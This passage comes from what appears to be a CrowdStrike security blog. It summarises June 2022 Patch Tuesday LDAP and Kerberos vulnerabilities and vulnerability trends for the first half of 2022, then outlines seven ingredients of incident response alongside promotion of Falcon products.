There are seven RCE vulnerabilities affecting Windows LDAP patched this month, a decrease from the 10 LDAP patches last month. One is rated as Critical (covered in the previous section), and six are ranked as Important. The most severe of these received a CVSS score of 8.8 but would require the MaxReceiveBuffer LDAP policy to be set to a value higher than the default value.

Rank CVSS Score CVE Description
Important 8.8 CVE-2022-30161 Windows LDAP Remote Code Execution Vulnerability
Important 8.8 CVE-2022-30153 Windows LDAP Remote Code Execution Vulnerability
Important 8.1 CVE-2022-30141 Windows LDAP Remote Code Execution Vulnerability
Important 7.5 CVE-2022-30143 Windows LDAP Remote Code Execution Vulnerability
Important 7.5 CVE-2022-30146 Windows LDAP Remote Code Execution Vulnerability
Important 7.5 CVE-2022-30149 Windows LDAP Remote Code Execution Vulnerability

Two Important Kerberos Vulnerabilities

Two vulnerabilities involving Windows Kerberos and Kerberos AppContainer received CVSS scores of 8.8 and 8.4, respectively, and a rank of Important. Nonetheless, these vulnerabilities are relevant to any organization using the affected products. 

CVE-2022-30164: Kerberos AppContainer security feature bypass vulnerability. If exploited, an attacker could bypass the Kerberos service ticketing feature that performs user access control checks. According to Microsoft, no user interaction is required, and attack complexity is rated Low. For more details, click here.

CVE-2022-30165: Windows Kerberos elevation of privilege vulnerability. Ranked as Important with a CVSS of 8.8, this bug in Kerberos affects servers with both Credential Security Service Provider (CredSSP) and Remote Credential Guard (RCG) installed. An attacker could elevate privileges then spoof the Kerberos logon process when an RCG connection is made via CredSSP. According to Microsoft, no user interaction is required and attack complexity is rated Low. For more details, click here.

Rank CVSS Score CVE Description
Important 8.8 CVE-2022-30165 Windows Kerberos Elevation of Privilege Vulnerability
Important 8.4 CVE-2022-30164 Kerberos AppContainer Security Feature Bypass Vulnerability

Falcon Spotlight provides the visibility SecOps teams need to quickly identify which vulnerabilities are prevalent in your organization’s environment. When it comes to additional detection capabilities, Falcon Spotlight is completely integrated within the CrowdStrike Falcon® platform that offers a host of other capabilities, including the ability to take swift and instantaneous action by isolating potentially compromised hosts from exploited vulnerabilities. Additionally, the Falcon platform mitigates the risk from vulnerabilities that can not be patched rapidly by detecting and automatically preventing exploitation attempts and post-exploitation activity.

H1 2022 Vulnerability Recap

There have been 461 CVEs affecting Microsoft products as of June 14, 2022. While this is markedly lower than the 612 vulnerabilities reported in H1 2021, what has remained consistent is the persistence of adversaries working to take advantage of vulnerabilities across myriad products. Out-of-band (OOB) patching and active exploitation continues to occur (such as Follina and Log4j), meaning a review of Patch Tuesday vulnerabilities should be a key component in your vulnerability management program.

Figure 3. Number of CVEs that Microsoft released each month, January-June 2022

While April saw the greatest number of vulnerabilities patched — it was the only month to exceed 100 in H1 2022 — the quantity of patches in a given month does not correlate with higher risk or indicate a higher rate of exploitation. It also does not signify an increase in eCriminal behavior for a particular product or service. In the latest Verizon Data Breach Investigations (DBIR) Report, vulnerability exploit analysis showed that organizations running a robust vulnerability management program were able to patch or remediate vulnerabilities and had no discernable security issues relating to vulnerabilities. However, organizations that did not regularly review vulnerability within their lifecycle ended up with more incidents, especially around internet-facing hosts. 

What does all this mean for you in 2022? We have a few insights when it comes to maintaining your vulnerability management program:

  • Adversaries are persistent and consistent; they have all the time in the world and will continue to look for access in whatever way possible. Remember, a small amount of access is still access. 
  • Vulnerabilities do not exist in a vacuum; assets, hosts and entities are all connected to each other in an environment, and many of them to the internet as well. It’s increasingly apparent that holistic visibility of all assets and how they relate to each other should be monitored in conjunction with your vulnerability management program. Security hygiene and attack surface visibility can offer valuable insights into how you prioritize and patch vulnerabilities within your environment.
  • Patch Tuesday matters! If any part of your environment uses Microsoft products, or if other vendors conduct patching cycles, it’s important to review the patches released every month and take time to apply fixes or updates to products wherever applicable. 

When It Comes to Vulnerabilities, It’s Not Just About Quantity

Adversaries will never go away. They will use any and every opportunity to take advantage of a flaw, weakness or vulnerability. If you have the big “holes” fixed in your organization’s environment, that’s a great start, but to stay on top of your vulnerability lifecycle program, SecOps staff must regularly maintain the program you’ve defined to determine which vulnerabilities are critical to your environment. Even if a vulnerability has a high CVSS score, that doesn’t necessarily mean it’s critical to your team. Context and prioritization matter, especially given that many SecOps teams have limited time to apply updates and patches.

CrowdStrike recommends relying on solutions that aid in speedy mitigation and remediation when it comes to all vulnerabilities, both in and out of Patch Tuesday cycles. CrowdStrike’s suite of SecOps solutions help provide deep-level context, including insights surrounding more advanced threats. 

For vulnerability management specifically, Falcon Spotlight can help you dynamically rate and prioritize vulnerabilities that matter to your organization, and help you establish workflows to automate those CVEs that need to be scheduled for more regular maintenance. See how Falcon Spotlight operates via its game-changing AI with ExPRT.AI and workflows.

Learn More

This video on Falcon Spotlight™ vulnerability management shows how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization. 

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article

Additional Resources

Seven Key Ingredients of Incident Response to Reduce the Time and Cost of Recovery

8 June 2022 at 18:54

When a breach occurs, time is of the essence. The decisions you make about whom to collaborate with and how to respond will determine how much impact the incident is going to have on your business operations.

This blog outlines the seven key ingredients needed for successful incident response, given the spate of widespread ransomware attacks we are witnessing today. This unique approach to incident response is captured in an insightful CrowdStrike Services Incident Response eBook that describes in more detail the value of each ingredient and how it contributes to a substantial reduction in the time it takes to recover from a cyber incident (reducing weeks/months to hours/days) and the cost of recovery, and most importantly the avoidance of business downtime that could have a material impact on an organization’s financials.

These key ingredients are based on many years and thousands of IR engagements defending organizations across the globe against nation-state and eCrime threat actors. We have evolved and honed our incident response technologies, processes and methods to keep pace with these adversaries so we can help you respond to today’s sophisticated, widespread attacks.

With these key ingredients and the value they deliver, we can recover from a widespread attack with speed and precision, with minimal user impact and system downtime, and avoid any potential business outage or interruption for our clients. The key ingredients are:

  1. Immediate Threat Visibility
  2. Active Threat Containment
  3. Accelerated Forensic Analysis
  4. Real Time Response and Recovery
  5. Enterprise Remediation
  6. Threat Hunting and Monitoring
  7. Managed Detection and Response

If you suspect you are the victim of a breach, your traditional security technology and processes may have failed you. The faster you can deploy next-generation security technology, the faster you can stop the breach.

The last thing you want in this situation is to use a traditional recovery approach that suggests the only way to recover from a breach is the full blunt force of wiping systems and applying full system remediation (reimage, rebuild or replace). This approach may have worked for attacks that occur on a handful of systems, but against today’s widespread ransomware attacks that impact hundreds or thousands of endpoints, we need a more intelligence-driven and effective solution — one that provides immediate visibility to the full threat context and enables the real-time surgical removal of attack artifacts with speed and precision.

In effect, the first four ingredients are the key: gain immediate threat visibility, contain the active threat, accelerate the forensic analysis, and recover the endpoints using real-time response. We do this to minimize the percentage of endpoints that require full system remediation. We want to recover the majority of endpoints using real-time response, so we only have to focus on reimaging or rebuilding a much smaller number of systems. For some clients, we are able to recover all of their systems using CrowdStrike Falcon® Real Time Response, enabling them to get back to business faster. 

While we are typically able to recover environments rapidly, we continue to support our clients with threat hunting and monitoring from the Falcon OverWatch™ threat hunting team for the duration of the engagement. Adversaries that gain access to a network look to establish persistence within your environment and are not going to go away easily. The OverWatch team monitors for any recurrences of the initial threat and any hands-on-keyboard activity that the adversary might attempt. At the end of the CrowdStrike Services Incident Response engagement, we want our clients to feel confident they have recovered from the breach and ejected the adversary completely from the network. For those clients that never wish to go through this again, we offer a fully managed detection and response (MDR) solution, Falcon Complete™, which allows customers to continue running the Falcon platform while relying on the expertise of our team to detect threats in 1 minute, investigate in 10 mins and respond inside of 1 hour to prevent breaches from impacting their business.

For more details on our modern intelligence-led approach to rapid response and recovery from today’s widespread security incidents, download our eBook on CrowdStrike Incident Response.

Additional Resources

  • Learn more about how CrowdStrike Breach Services can help you respond to an attack with speed and recover from an incident with surgical precision.
  • Download the complete CrowdStrike Incident Response eBook to learn more about CrowdStrike’s modern approach to rapid response and recovery from today’s widespread security incidents.
  • Get on-demand access to CrowdStrike incident responders, forensic investigators, threat hunters and endpoint recovery specialists with a CrowdStrike Services Retainer.
❌